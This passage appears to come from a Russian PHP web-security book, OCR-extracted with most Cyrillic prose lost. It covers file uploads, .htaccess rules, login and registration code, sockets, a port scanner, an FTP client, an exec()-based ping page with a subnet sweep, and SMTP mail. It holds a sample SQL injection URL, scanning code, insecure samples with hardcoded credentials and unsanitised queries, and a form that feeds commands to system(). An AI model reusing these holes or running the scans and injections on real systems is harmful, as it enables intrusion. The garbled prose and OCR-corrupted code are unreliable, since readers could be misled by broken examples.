. . ,
. ReadCache ()
WriteCache () .
/.
Web- , , , . . , .
,
(, , ), , , ,
.
4.4.3.

, .
,
.
2.2 included r e q u i r e ! ) .
, , . ,
,
PHP- . .
210
HTML-,
include () require () . r e a d f i i e o .
, PHP-
.
i n c lu d e d , , ,
readf i l e ().
p r i n t O .
:
print("$name");
, $name, , .
, .
,
.
:
print($name);
, , , . ,
,
.
?
:
print(' : ' ) ;
print($name);
, , :
print(" : $name");
print , . , :
print(' :
'.$name);
.
p r i n t
:
printf("HMH : %s", $name);
$s ,
,
p r i n t () . $s,
, ,
.
211
, , . ,
,
ereg_replace() preg_replace(), str_replace()
. , str_repiace() ,
, .
, Perl-,
, , , .
, f i l e r e a d f i i e O . , :
$f=fopen("lMb_file.txt","")
while($x[]=fgets($f,1024));
fclose($f);
or d i e ( l ) ;
f i l e ( ) readfiieO ,
.
.
( ), .
4.5. vs.
, , , . ,
, , , , ,
.
. , . .
. ,
.
, HTML-.
? , Perl , ,
. , , .
212
[.1 4
HTML-, :
< >, , , ,
, ;
< > , .
:
$posl = strpos($mystring, "<");
$pos2 = strpos($mystring, ">");
if (($posl === false) and ($pos2 === false))
{
//
}
else
{
//
// ,
//
}
endif
$mystring ,
. strpos () ,
< >. false, . .
< >, , .
, ,
, , , .
, , . , , .
< >
.
99% .
.
, .
,

.
213
, , 3. ,
, . ,
, .
. , , , . , ,
if. .
, , .
:
. ,
, Web-
, , . 2.
.
. , .
, PHP- .
,
, .
( sendmail ), .
. ,
.
, ,
.
,
, . ,

.
. ,
, URL, . , , , .
,
, .

, . , , , . .
, , , .
, .
, ,
.
- ,
.
, - , . . ,
100 .
5.1.
.
- ,
. , , .
,
POST. POST 2.12, PUT
. PUT
URL .
4 - ,
. ,
HTML-. POST , .
PUT
216
, , HTML-
:
<form action="http://192.168.77.1/1/post.php"
method="post"
enctype="mult ipart/form-data">

<br><Pxinput name="filel"
type="file">
<br><Pxinput type="submit" value="Send files">

</form>
, action , enctype. , . application/x-www-form-urlencoded, . .

. , , , multipart/form-data.
input. ( type) file. ,
.
(. 5.1).
mm
3 bVI.htm - Flenov Internet Explorer

Eta
Edit
View
evorites
Tools Hep
.'''Search
' ''"-- Favorites
g j Go
Send these files:
"
[ Send files
H Don,
| Browse... |
fj
My Computer
. 5 . 1 .
?
. , .
, .

$HTTP_POST_FILES. . -
217
, .
, $__1[] . , ,
f i l e l , : $HTTP_POST_FILES["filel"].
. :
tmp_name , ;
name ;
type ;
s i z e .
, , ,
: $PHP_POST_FILES[filel"]
["tmp_name"] .
. Unix-, ,
/tmp, .
, . ,
. ,
.
, ,
/var/www/html/files
:
<?php
print("<P> File Size: %s", $HTTP_POST_FILES["filel"]["size"]);
print("<P> File Type: %s", $HTTP_POST_FILES["filel"]["type"]);
print("<P> File Name: %s", $HTTP_POST_FILES["filel"]["name"]);
print("<P> Temp File Name: %s",
$HTTP_POST_FILES["filel"]["tmp_name"]);
if (copy($PHP_POST_FILES["filel"]["tmp_name"],
"/var/www/html/files/".$HTTP_POST_FILES["filel"]["name"]))
print(" ");
else
print(" 1</>");
?>
php.ini. file_uploads.
, on.
, , off,
8 . 1315
218

.
. , .
( register_globals on),
:
$ f i i e i ;
$f iiei_name ;
$fiiei_size ;
$fiiei_type .
:
<?php
print("<p>Temp file name $filel");

print("<P>File name $filel_name");
print("<P>File size $filel_size");
print("<P>File type $filel_type");
if (copy($filel*
"/var/www/html/files/".$filel_name))
print ("<PxB>Complete</B>") ;
else
print(" 1</>");
?>
.
file.txt, /tmp/phpmllXXc.
,
$fiiei_name, . . ,
-.

CyD FTP Client XP (www.cydsoft.com). ,
Remote | File permissions
( | ) (. 5.2). ,
. ,
, , .
: , , .
Linux "Linux " [1].
219
File permissions
File name: artayparam.php

User: 48
Group: 48
Owner: 0 Read
0 Write
0 Execute
Group:
0 Read
Write
0 Execute
Public:
0Read
0 Write
0 Execute
All Read
Manual
All Write
1 All Execute
757
OK
"
Cancell
rr
rnnr -in1
. 5.2.
. : HTML-, . HTML-
MAX_FILE_SIZE,
:
<input type="hidden" name="MAX_FILE_SIZE"
value="300">

300 . .
.
:
<form action="http://192.168.77.1/l/post.php" method="post"
enctype="multipart/form-data">
:
<input type="hidden" name="MAX_FILE_SIZE" value="300">
<brxinput name="filel" type="file">
<br><input type="submit" value="Send files">
</form>
. ,
, $ f i i e i _ s i z e ,
$ f i l e i _ s i z e . ,
220
- ,
:
if ($filel=="none")
die(" ");
,
, HTML-. , :
<?php
if ($filel_size>10*1024)
die(" ");
if (copy($filel,
"/var/www/html/files/".$filel_name))
print ("<PxB>Complete</B>") ;
else
print(" 1</>");
?>
, 10 (10, 1024 , . .
1 ).
, ,
.
upload_max_fiiesize php.ini.
2 .
upload_max_filesize = 2
: , , .
, .
5.2.
5.1 ,
. ,
.
. ,
- , .
221
, . ,

, .
, ,
, , . ?
. ,
. , .
GIF , 5.2. type
image/gif. image,
. JPEG-
jpg, jpeg pjpeg, PNG- png.
,
.

gif . type
plain/text. , , , "", . ,
, .
5.1 , ( ),
. ,
, preg_match () ' ( [ a - z ] + ) \ / [ \ - ] * ( [ a - z ] + ) ' . switch.
( ),
die() .
5.1.
<?php
preg_match("' ([a-z]+)\/[\-]*([a-z]+) "', $filel_type, $ext);
print("<P>$ext[l)");
print("<P>$ext[2]");
switch($ext[2])
{
case "jpg":
222
case "jpeg":
case "pjpeg":
case "gif":
case "png":
break;
default:
die("<P>This is not image");
if
(copy($filel,"/var/www/html/files/".$filel_name))
print("<P><B>Complete</B>");
else
print("<P>Error copy file 1</B>");
.
. , getimagesizeO. ,
.
getimagesizeO , . . , .
, :
$im_prop=getimagesize($filel);
print("<P>$im_prop[0]x$im_prop[l]");
if ($im_prop[0]>0)
{
if
(copy($filel,"/var/www/html/files/".$filel_name))
print("<P><B>Complete</B>");
else
print("<P>Error copy file 1</B>");
}
else
die("Image size error")
getimagesizeO . :
;
;
223
, 1 - GIF, 2 = JPG, 3 = PNG, 4 = SWF, 5 = PSD, 6 = BMP,

7 = TIFF ( intel), 8 = TIFF ( motorola), 9 - JPC, 10 = JP2,
11 =JPX;
height="yyy"
width="xxx".
, , .
,
.
, . ,
. , .
, getimagesizeO.
TIFF,
- 8 , ,
. , (DoS, Denial of Service).
JPEG-.
, getimagesizeO , , ,
, ,
. ,
.
5.3.
FTP- . ,
, ,
HTTP, , , FTP- .
Web.
Web, .
,
.
.
5.3.1. Web-
- Web- ,
.htaccess.
, , .
224
Web- . , Web-,
. , .
.htaccess:
AuthType Basic
AuthName "By Invitation Only"
AuthUserFile /pub/home/flenov/passwd
Require valid-user

AuthType. Basic, Web-
. , AuthName,
. . 5.3 .
Connect to www.vi-online.iu
!11
By Invitation Only
User name:
Password;
* Remember my password
OK
Cancel
. 5..
AuthUserFile , . ,
, . Require valid-user. ,
, .

, .
225
.htaccess allow from.

, , :
order allow,deny
allow from all

( /var/www/html), ( http://servername/server-status).
, .
:
allow from , . :
a l l ;
,
. , domain.com.
Web. - ,
, , allow from localhost;
IP- IP-.
, ,
,
, . , , ;
= ,
. : allow from
=;
deny from . , allow from,

, . .;
order , allow
deny. :
order deny, allow ,
, .
, , , ;
order allow, deny , , .
;
226
order mutual-failure ,
allow deny. , ,
, , ;
Require ,
. :
user ( ID),
. , Require user robert FlenovM;
group ,
. , user;
valid-user ;
satisfy any, /, IP-.
a l l ;
AiiowOverwrite ,
.htaccess Web ( httpd.conf Apache). : None, ,
AuthConfig, Filelnfo, Indexes, Limit Options;
options [+ | -] Web-, . ,
, . ,
,
. . , Web-.
, ,
.
:
, MultiView. Option + A H , TO
, MultiView,
;
ExecCGi CGI-. ,
/cgi-bin, , ;
FoiiowSymLinks . , , .
227
3.1.3 , , , ;
SymLinksifOwnerMatch ,
. FoilowsymLinks. /etc Web-,
;
includes SSI (Server Side Include,
);
includesNOEXEC SSI, exec include.
CGI , ;
indexes ,
. , , , www.cydsoft.com. ,
. URL www.cydsoft.com/
index.htm.
. index.htm, index.html, index.asp
index.php, default.htm . . , indexes , .
,
;
Multiviews .
,
. :
<Files >
</Files>
:
<Files "/var/www/html/admin.php">
Deny from all
</Files>
, . /var/www/html ,
/var/www/html/admin.php .
, HTTP, GET, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH,
228
PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK. ? , , . POST GET. , GET, TO
, , .
, . ,
,
. HTTP.
:
<limit >
, . , :
<Limit GET POST>
Deny from all
</Limit>
GET POST.
,
.
.
" , ".
, , , .
, , .
IP-,
:
allow from 101.12.41.148
allow from , .
, IP-
, .
httpd.conf, :
<directory />
AuthType Basic
AuthName "By Invitation Only"
229
AuthUserFile /pub/home/flenov/passwd
Require valid-user
</directory>
,
. , Web- httpd.conf, , .
, .htaccess,
,
. , , , , . httpd.conf , . .
/etc, Web- .
,
. AuthUserFile , .
:
flenov:{SHA}lZZEBtPy4/gdHsyztjUEWb0d90E=
, .
, MD5
. (
) ,
htpasswd
Web- Apache.
Web- HTTP.
,
MD5, crypt ().
.
DBM ( .htaccess AuthDBmserFiie),
dbmmanage.
, htpasswd.
:
htpasswd
,
. , :
- . ,
, .
:
htpasswd - .htaccess robert
230

robert . .htaccess,
robert ;
- Apache MD5 . (Windows, Unix, BeOS . .), Web- Apache.
, , ;
d - d crypt ();
-s SHA- ( ),
Netscape;
- . ,
;
- , .
, :
htpasswd .htaccess Flenov
htpasswd :
, 255 .
, .
,
.
Web-
.
Base64. ,
, . Base64 , , .
.
( , )
HTTPS, SSL.
5.3.2.
Apache
Web- ,
- . ,
231
, ,
, . .htaccess
:
Order Deny,Allow
Deny from all
Allow from 127.0.0.1
,
. , , Web-, .
, ,
, URL.
( , , . .) ,
.htaccess.
, ,
.
, , include. , , .
,
.
Web- . Base64.
"". , , . :
<?php
$str="This is test";
print("< : $str");
$encoded=base64_encode($str);
print("<> : $encoded");
$decoded=base64_decode($encoded);
print("<P> : $decoded");
?>
, Web- :
: This is a test
232
: VGhpcyBpCyfOZXNO
: This is a test
, , . , ,
.
5.3.3.
,
. - . :
if (! $logged)
{
echo("<form action="admin.php" method="get">");
echo(": <input name="UserName">");
echo(": <input name="Password">");
</form>
}
if ( )
{
// ,
// $logged 1
}
else
{
// $logged
if
($logged=l)
//
//
, :
<BR>Password: <input type="password" name="pass">
233
password. , ,
.
, .
,
, , .
, ,
.
, .
.
, :
if.. .else. , 1, ,
0. ? ,
, , URL,
. , i f . . . e l s e
, , URL, .
, .
. ? ,
, cookie, .
,
, , . , ,
.
:
1.
. ,
.
2.
. ,
, (,
10 ), .
, cookie , ,
, . , ,
, . 9 3. 1315
234
5 , , , - ,
.
5.2 .
: 5.2.
<?php
@session_start() ;
session_register("username");
session_register("password");
?>
<form action="authorize.php" method="post">
<> </>
<>: <input name="user">
<>: <input type="password" name="pass">
<Pxinput type="submit" value="">
</form>
<?php
if (isset($user))
{
$username=$user;
$password=$pass;
if (($username=="admin") and ($password=="qwerty"))

{
print("<> $name<HR>");
print("<P><A HREF=\"authorize.php?id=l\">Co3flaTb </>");
print("<P><A HREF=\"authorize.php?id=2\">JÊ^MTb </>") ;
if ($id==l)
{
//
print("<><1>0 </1>");
if ($id==2)
235
//
print("<><1> </1>");
, , .
, , SQL
Injection. , , ,
, , , .
:
1.
LJRL, POST.' , , URL
.
2. Web- , ,

cookie, .
3. . ,
,
cookie . ,

. cookie Cross-Site
Scripting, ,
. ,
, ,
.
.
4. cookie, , md5 (). cookie
.
Cookies, .
cookie,
.
236
cookie, :
cookie ,
.
, ;
;
, cookie . Heir,
;
,
. cookie , , ,
.
, ,
.
5. ,
, , .
, .
, , .
- ,
( )
6. , .htaccess . ,
. , URL, ,
:
<Files "/var/www/html/admin.php">
Deny from all
Allow from 127.0.0.1
</Files>
,
.
, 4
( 5.3).
237
I 5.3.
<?
@session_start();
session_register("username") ;
session_register("password");
session_register("secure") ;
if (isset($susername) and (!isset($clearsecure))
{
$username=$susername;
$pas sword= $ spassword;
}
else
{
$secure="";
$password = md5($password);
if (!isset($username))
die(" ");
$username = check_param($username);
$secure = check_param($secure);
// ,
if ($secure!="")
{
// , $secure
$query = DBQuery("SELECT * FROM UsersTable WHERE
(user_name = '$username');
$users = mysql_num_rows($query);
if (!$users)
die(" ");
if (($password == $user_data[password_field])
($secure == $user_data[secure_field]))
{
// ,
238
5
$secure = md5(rand(l, 1000000));
DBQuery("UPDATE UsersTable SET secure_field = '$secure' WHERE
user_name = '$username' ") ;

setcookieC'ssecure", $secure, mktime(0,0,0,1,1,2010));
else
{
// ,
setcookie("spassword", "", 0) ;
setcookie("ssecure", "", 0);
// ,
// ,
if (($username) and ($secure==""))
{
$query = DBQuery("SELECT * FROM UsersTable WHERE
(user_name = '$username');
$users = nvysql_num_rows($query) ;
if (!$users)
die(" ");
if ($password = $userd[password_field]))
{
$secure = md5(rand(1, 1000000));
DBQuery("UPDATE UsersTable SET secure_field = '$secure'
WHERE user_name = '$username'");
setcookie("susername", $username, mktime(0,0,0,1,1,2010))
setcookie("spassword", $password, mktime(0,0,0,1,1,2010)
setcookieC'ssecure", $secure, mktime(0,0,0,1,1,2010));
print(" $ldata[0]");
}
else
{
print(" ");
239
//
<form tion="index.php" method="post">
<B> </>
: <input name="username" size="20">
: <input type="password" name="password" size="20"xbr />
<input type="hidden" name="clearsecure" value="l">
<input type="submit" value="Bxofl">
</form>
,
. ,
. , ,
- cookie .
clearsecure. $ secure, cookie. ?
, . , $ciearsecure 1. , .
, cookie.
, cookie ( $susername).
$clearsecure, , cookie. , . , , :
if ((isset($susername)) and (!$clearsecure))
{
$us ername=$ sus ername;
$password=$spas sword;
}
else
{
$secure="";
$password = md5($password);
240
, ( $username) , ,
:
if (lisset($username))
die(" ");
.
check_param (), ,
, :
function check_param($var)
{
$var=preg_replace("/['4a-za-H0-9\., _\n]/i", " " , $var) ;

return $var;
}
, :
$secure = check_param($secure);
,
.
SQL Injection, $password l , if.
, .
$secure , :
1. , .
2. , .
3. . , cookie.
, $secure . , $secure , .
cookie , .
5.3.4.
, , , .
? , . . , -
241
,
, , .
, .
, ( ) . ,
, .
, ,
, , . , .
, .
, ,
, . , , , - ?
, ,
.
, , ? ,
,
.
, , . , , , .
? :
<?
//
if (($username=="") and (!isset($id)))
<form action="register.php" method="post">
242
5
II ,
<input name="username" size="32">

<input name="passl" type="password" size="32">
<input name="pass2" type="password" size="32">
E-mail <input name="email" size="32">
<input type="submit" value="3aperncTpHpoBaTbCH">
</form>
//
if ((username!="")
{
if ($passl != $pass2)
die(" ");
//
// 2-
$tmax=time()-7200;
DBQuery("DELETE FROM users WHERE reg_time < $tmax AND active=0");
// , E-mail
$query = DBQuery("SELECT * FROM users WHERE user_name =
'$username' or email = '$email'");
if (mysql_num_rows($query))
die(" ");
$activatekey = md5(rand(l, 1000000)).$username;
$password=md5($passl);
$userrtime = time ();
DBQuery("INSERT INTO users (user_name, pass, reg_time, email, key,
active) VALUES ('$username', '$password', '$userrtime', '$email',
1
$activatekey', ' 0 ' ) ") ;
Smailbody = " .\\

:\
http://www.yoursite.com/register.php?id=$activatekey \\";
243
// $email $mailbody
//
if
(isset($id))
{
$result = DBQuery("SELECT * FROM users WHERE key = '$id' and active=0");
$data = raysql_fetch_array($result);
if (!mysql_num_rows($result))
die(" . , ");
DBQuery("UPDATE users SET active=l, key="" WHERE key = '$id' and active=O");
print(" ");
,
. , .
$username ( ) $id (
) , .
, .
, , . , , , . - .
, , , :
$tmax=time()-7200;
DBQuery("DELETE FROM u s e r s WHERE r e g _ t i i n e < $tmax AND a c t i v e = 0 " ) ;
?
, . . , "", . ,
,
.
244
, .
, . ,
. , ,
reg_time , ( key) (
active 0, . . ).
? ,
. md5 (). 2 ,
. .
,
.
.
:
$activatekey = md5(rand(1, 1000000)).$username;
$password=md5($passl);
$userrtime = time();
DBQuery("INSERT INTO users (user_name, pass, reg_time, email, key,
active) VALUES ('$username', '$password', '$userrtime', '$email',
1
$activatekey', '0') " ) ;
( 5.9) URL . I RL?

id,
URL :
http://www.yoursite.com/register.php?id=$activatekey
URL
$activatekey.
. $id ,
, ,
. , , , . , , key, active
1.
,
, . . -
245
.
, .
:
$id = check_param($id);
$email = check_param($email);
$passl = check_param($passl);
$pass2 = check_param($pass2);
, , $id, , URL,
. URL
- :
http://www.yoursite.com/register.php?id=';SHOW DATABASES;-'
, $id SQL-, .
, , ,
.
{^
\Chapter5\register.php , .
5.3.5.
3.2.5 ,
,
. qwerty , ,
. ,
.
, , . ?
:
,
:

8 ;
246
, .
.
preg_match,
, - :
if
(!preg_match("/[A-Z]/\
$var))
die(" ");
if (! (preg_jnatch("/[a-z]/\ $var)))
{
die(" " ) ;
}
if (!preg_match("/[.-_*ScA%$#@!~]/", $var))
{
die(" ");
}
if (!preg_match("/0-9/", $var))
{
die(" ");
}
, ( )
,
. , ,
. :
;

, , .
5.3.6.
, , , , ,
,
. -
247
Microsoft (Microsoft Passport). , .

.
, ,
. , ,
, ,
- .
,
, , -, .
5.4.
, , .
, , . ,
.
, . ,
. .
Web-. , - ,
. ,
, ,
.
. ,
,
, ,
. ,

.
, ,
, ? . , -
248
,
.
, . ,
index.php:
if ()
<form action="authorize.php" method="post">

<> : <input name="userdata">
< P x i n p u t type="submit" value="Enter">
</form>
, ,
, authorize, plip.
!.
HTML- authorize.php, \<
. :
index.php , ,
. , , , , , ,
;
authorize.php . ,
- , . , , ,
.
5.5.
, , .
. , backdoor, . .
, .
249
,
, , TCP UDP,
, . .
-. ,
.
5.5.1. DNS
,
DNS (Domain Name System, ). IP-,
. , IP-
DNS, IP.
, IP- gethostbynameO
gethostbynamel .
, IP- . gethostbynameO IP-,
a gethostbynamel () . ,
IP-.
,
g e t h o s t b y n a m e ( ) , .
IP- :
<?php
$host_ip = gethostbyname("www.yahoo.com");
print(" Yahoo IP : $host_ip");
?>

IP- . gethostbyaddrO.
IP-, :
$name=gethostbyaddr("127...1");
print("Your computer name: $name");
IP-,
. IP-
, , , DNS. gethostbyaddrO , IP, .
127.0.0.1 , , , localhost.
250
5.5.2.
, .
1
, Web FTP
, ,
. ,
? , TCP ( FTP, HTTP, POP3, SMTP ...)
UDP.
. ,
. , FTP 21, Web 80. TCP- UDP- IP- , , , - .
. ,
, ( Linux /etc/protocols), ,
, ftp
.
, getservbyname (i,
(tcp udp),
.
getservbyport (), . ? , TCP UDP
. 21 TCP , UDP.
TCP UDP? TCP , . , -
. ,
.
. ,
, , .
UDP , .
, , ,
. . ,
.
251
5.5.3.
( -
) , , Windows Unix. , .
- ,
, . ,
. , , , .
.
, , .

socket_strerror (). , (
socket_bind()). .
, , , .
socket_create (), :
int socket_create(int domain, int type, int protocol)
:
:
AF_INET . TCP, UDP, FTP,
HTTP, POP3 . .;
AF_UNIX ;
:
SOCK_STREAM , . . TCP;
SOCK_DGRAM UDP,
;
SOCK_SEQPACKET .

;
SOCK_RAW ( IP);
SOCK_RAW ,
;
252
, 0,
.
socket_create () ,
.

.
socket_bind ():
int
socket_bind(int socket, string address [, int port])
:
socket_create () ;
IP-;
.
socket_listen()
,
:
int socket_listen(int socket, int backlog)

, .
,
. socket_accept ().
, .
, , , .
, , .

socket_create () , socket_connect():
int socket_connect(int socket, string address [,int port])
:
socket_create () ;
IP- , ;
, .
253
, ,
:
1. .
2. , IP.
3. .
,
, .
,
: fsockopen psockopeno. , , . :
int fsockopen(string host, int port,
int errno, string errstr, double timeout)
, :
IP- , ;
, ;
, .
0;
, ;
, . , , , .
fsockopen psockopeno?
,
, psockopeno . fsockopeno, , .
,
, psockopen() .
psockopeno 80:
$s=psockopen("servername.com", 80) ;
TCP. UDP,
udp://, :
$s=psockopen("udp://servername.com", 80);
254
,
.

, , . .
socket_write():
int
socket_write(int socket, string bbuffer,
int length)
:
, ;
, ;
.

.

socket_read ()'.
string socket_read(int socket, int length [, int type])
:
,
;
, ;
:
PHP_BINARY_READ , , ;
PHP_NORMAL_READ , , ,
: \ ( ) \ ( ).
.
,
,
,
.
255

, . socket_set_timeout ()
:
boolean socket_set_timeout(int socket, int sec, int mic)
:
, ;
;
.
/ , .
, socket_set_biocking(),
. , socket_accept ().
, socket_accept () .
-
.
, .
socket_read() , , .
socket_set_biocking()
:
int socket_set_blocking(int socket, int mode)
, .
true, , .
5.6.
,
? , , , , , . ,
, .
? , ,
. -
256
, -
. , .
, -
Web- ,
, . , 1024 :
<?php
for ($i=l; $i<=1024; $i++)
{
$s=socket_create(AF_INET, SOCK_STREAM, 0);
$res=@socket_connect($s, "127.0.0.1", $i);
if ($res)
print("<P> $i");

. :
21 (ftp)
22 (ssh)
80 (http)
, . ,
1 1024 . socket_create(). TCP, AF_INET
( -).
SOCK_STREAM, TCP
.
$i socket_connect(). ,
, .
, @.
$res.
. true, ,
.
, .
. , Linux , "Linux " [1].
257
. , IP-
, . . .
, , .
:
<?php
for ($i=l; $i<=100; $i++)
{
$S=socket_create(AF_INET, SOCK_STREAM, 0 ) ;
$res=@socket_connect($s, $host_ip, $i);
if ($res)
{
$portname=getservbyport($ i, "tcp");
print("<P> $i ($portname)");
:
21 (ftp)
22 (ssh)
80 (http)
, , IP- gethostbynameo. , , , IP.

,
, gethostbynameo .
,
getservbyport ().
tcp, .
5.4 UDP.
-:
socket_create () SOCK_DGRAM, UDP-.
getservbyport () udp.
258
I 5.4. UDP-
<?php
for ($i=l; $i<=100; $i++)
{
$s=socket_create(AF_INET, SOCK_DGRAM, 0 ) ;
$res=8socket_connect($s, $host_ip, $i);
if ($res)
{
$portname=getservbyport($i, "udp");
print("<P> $i ($portname)");
, , . 1024 ,
socket_create (). , . ,
socket_create() . 5.5 .
5.5.
<?php
$s=socket_create(AF_INET, SOCK_STREAM, 0 ) ;
for ($i=l; $i<=100; $i++)
{
$res=@socket_connect($s, $host_ip, $i);
if ($res)
{
$portname=getservbyport($i, "tcp");
print("<p> $i ($portname)");
$s=socket_create(AF_INET, SOCK_STREAM, 0) ;
259
, , 1.
5.7. FTP-
. FTP-. ,
, , FTP-. , ,
, .
( 5.6).
5.6. FTP-
<?php
//
$host_ip=gethostbyname("localhost");
$s=socket_create(AF_INET,
SOCK_STREAM, 0 ) ;
//
if (!($res=@socket_connect($s,
$host_ip, 21)))
dieC'Can' connect to local host");

print("<P>Connected");
//
printf("<P><%s", socket_read($s, 1000, PHP_NORMAL_READ));
socket_read($s, 1000, PHP_NORMAL_READ);
//
$str="USER flenov\n";
socket_write($s, $str, strlen($str));
print("<P> > $str");
printf("<px%s",
s o c k e t _ r e a d ( $ s , 1000, PHP_NORMAL_READ));

//
$str="PASS password\n";
260

printf("<P>< %s", socket_read($s, 1000, PHP_NORMAL_READ));
// SYST ( )
$str="SYST\n";
printf("<P>< %s", socket_read($s, 1000, PHP_NORMAL_READ));
socket_read($S, 1000, PHP_NORMAL_READ);
. IP- FTP-.
, localhost.
- 21.
FTP- , . , ,
. ? ,
FTP- , (\) (\), :
220 flenovm FTP server (Version wu-2.6.2-5) ready.\n\r
socket_read() PHP_NORMAL_READ , \ \, , :
220 flenovm FTP server (Version wu-2.6.2-5) ready.\n
\r
.
, , .
, , <, , .
, FTP- :
$str="USER flenov\n";
261
printf<"<Px%s", socket_read($s, 1000, PHP_NORMAL_READ));

socket_read($ s, 1000, PHP_NORMAL_READ);
$str ,
. FTP-
(\).
socket_write(). , , Web- , ,
>, , .
. .
, .
,
:
Connected
<220 flenovm FTP server (Version wu-2.6.2-5) ready.
> USER flenov
<331 Password required for flenov.
> PASS vampir
< 230 User flenov logged in.
> SYST
< 215 UNIX Type: L8
FTP-,
.
HTTP-, , 5.1. FTP , .
, FTP- , .
FTP- :
, .
FTP- ,
, ,
. , FTP-
;
FTP- . , , ,
, ;
262
, , . HTML-, , ;
,
"
". FTP , , , .
5.8. ping
ping ,
.
. , , .
, .
? - , , - . ,
, ping
IP-. ,
, 110.12.87.21, 110.12.87.1
110.12.87.254 . ,
,
, . , - , .
,
IP- . . , ,
.
, , .
ping, execo, system . 5.7 , .
. . .
. .
263
5.7.
<form action="ping.php" method="get">

<> IP- </>
<> : <input name="server">
<BRxinput type="submit" value="Ping">
</form>
<?php
if (lisset($server))
exit;
$server=preg_replace("/[Aa-z0-9-_\.]/i", "", $server)
print("<HR>P.ing server $server");
exec("ping -c 1 $server > ping.txt", $list) ;
print!"<PRE>");
readfileCping.txt") ;
print("</PRE>");
IP- . exec (),

.
.
ping,
- ,
ping.txt.
, .
. 5.4.
5.8 , . ping 10
IP-.
264
3 E:\CyD\Book\PHP\Chapter5\ping.htm - Flenov Internet Explorer

File
Edit
\1
Favorites
f&Buck - V- 3
'"-'--
T_ools
Help
\\ 12) #'*lV Search sh>Favorites lA^Media **'
0 ] = : . : = ; ; ?',|115\1.11
' '
fv5 * I
v
L J5 o
Type server name or IP address

Server: |
I
Pingsen-er 192.168.77.1
192.163.77.1 (192.18.77.1) tra 192.168.77.1 : SciS^j bytes of u&Zu.
64 oyces from 192.1*4.77.1: icnp_ij"l ctl*4 1**0.12<
192.i5.77.1 ping sz&ziszics
1 peoicets u t U M l M t ) 1 reseaved, 0% 1 , CUM Cms
t t Bln/svg/max/aBl*- = 0.126/0.126/0.126/0.000
Internet
. 5.4. ping
5.8. IP-
<form action="ping.php" method="get">
<> server name or IP address</B>
<BR>Server: <input name="server">
<BR><input type="submit" value="Ping">
</form>
<?php
if ( !isset($server))
exit;
$server=preg_replace("/[-0-9-_\.]/i", "", $server);
$i=l;
ereg(([0-9]{l,3})\.([0-9]{1,3})\.([0-9]{1, 3})\.([0-9]{1, 3}) '
' '
265
Sserver, $regs);
while ($i<10)
{
print("<HR>Ping server $regs[l].$regs[2].$regs[3].$i");
exec("ping -c 1 $regs[1].$regs[2].$regs[3].$i >ping.txt", $list);
print("<PRE>");
readfileCping.txt") ;
print("</PRE>");
, ereg (). .
,
IP-, . ping
. ,
.
, ( )
, . ping .
5.9.

Web-. ,
. ,
. (Web- ), .
, . SMTP (Simple Mail
Transfer Protocol, ), (Post Office
Protocol, ).
. 1315
266
,
, ,
. , Unix-, sendmail,
, 10 .
Web-? , , -
. , .
5.9.1. SMTP

SMTP. , ,
, . , , .
, SMTP , FTP.
( SMTP 25) .
, , :
<
>
<
>
<
>
<
>
<
>
>
>
>
>
>
220 smtp.aaanet.ru ESMTP Exim 4.30 Wed, 14 Jul 2004 15:20:17 +0400
HELO notebook
250 smtp.aaanet.ru Hello notebook [80.80.99.95]
MAIL FROM:<vasya@pupkin.ru>
250 OK
RCPT TO:<horrific@vr-online.ru>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
From: <vasya@pupkin.ru>
To: <horrific@vr-online.ru>
Subj ect:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii

< 250 OK id=lBkhoA-000EkB-0S

> QUIT
< 221 smtp.aaanet.ru closing connection
267
, >, , , , <, , . , ,
.
. , SMTP :
220
220 . , , , :
220 your_mail_server.com ESMTP Sendmail 8.9
,
sendmail 8.9.
, .
.
HELO notebook. notebook
. 250
.
(MAIL FROM:<vasya@pupkin.ru>)
(RCPT TO:<horrific@vr-online.ru>).
250.
, .
DATA. ,
, .
, . <CR><LF>.<CR><LF> ( ,
, , , ).
250. ,
, .
:
From: <vasya@pupkin. ru>
:<horri fic@vr-online.ru>
,
:
Subject:
.
:
>Mime-Vers ion: 1.0
>Content-Type: text/plain; charset="us-ascii
; >
268
QUIT.
. 5.1 SMTP-,
.
5.1. SMTP-
HELO
SMTP-.
HELO
MAIL
.
MAIL
FROM <e@mail. ru>?, e@mail. r u
RCPT
DATA
. <CRxLF>.<CR><LF>

RSET
NOOP
. .

, , . timeout,
QUIT
HELP

RFC-821, .

25 .
, , FTP-.
5.9.2. mail
mail (),
:
boolean mail(to, subject, body [extra])
, :
. , ;
269
;
;
. , .
(CR LF).
5.9
mail().
I 5.9.
<?php
//
$MailTo = "recipient@mail_server.com";
$MailSubj = " ";
$MailFrom = "your_name@your_server.com";
$MailCC = "namel@@mail_server.com,name2@@mail_server.com";
$Extra = "From: $MailFrom\r\nCc: $MailCC";
//
if(mail($MailTo, $MailSubj, " ", $Extra))
print(' $MailTo 1);
else
print('');
, .
, : ,
.
30 ( ), . , 1000 30 , .

. - ,
, . - -
270
set_time_out(), -
. - 10 :
set_time_out(600)
:
, .
. ,
Unix Windows ,
, Web .
,
. .
5.9.3. SMTP-
5.9.1 , SMTP. mail ,
, . php.ini [mail functions|,
, :
[mail function]
I For Win32 only. ( Windows)
SMTP = localhost
; For Win32 only. ( Windows)
sendmail_from = me@localhost.com'
; For Unix only.
You may supply arguments as well
; (default: 'sendmail -t -i').

; Unix.
; ( 'sendmail -t -i 1 )
;sendmail_path =
SMTP sendmail_from , Windows, sendmaii_path

Unix.
271
Unix sendmail. , , sendmaii_path, . ,

sendmail, , SMTP-. , qmail :
sendmail_path=/var/qmail/qmail-inject
5.9.4.

,
. , ,
. . , .
, SMTP. ,
, . ,
,
sendmail. , ,
.
SMTP-,
. 3.6.2
,
.
5.10.
,
. ?
, , .
,
. , .
Shareware-,
, .
272
,
URL- .
, . , URL,
. ,
, Apache,
,
, ,
.
(,
)
.
. , Warez-, ,
.
, .
5.11.
, Perl . ? , Perl,
.
, .
, , .
, , ,
, , . , ,
.
, :
$var=preg_replace("/[-0-9[] -_\n]/i", "", $var);
, , , [ ], ,
, . , , , [ ]
.
, , [ ] , , preg_repiace ()
. :
$var=preg_replace("/[-0-9\[\]
-_\n]/i",
"",
$var);
273
.
-, "". :
$var=preg_replace("/[--0-9\[\]
-_\n]/i",
"",
$var);
, -, ,
. ,
, , systemO, 5.8
Web- ping.
, , .
, FTP
, :
<?
<form action="system.php" method="get">

Command: <input name="sub_com">
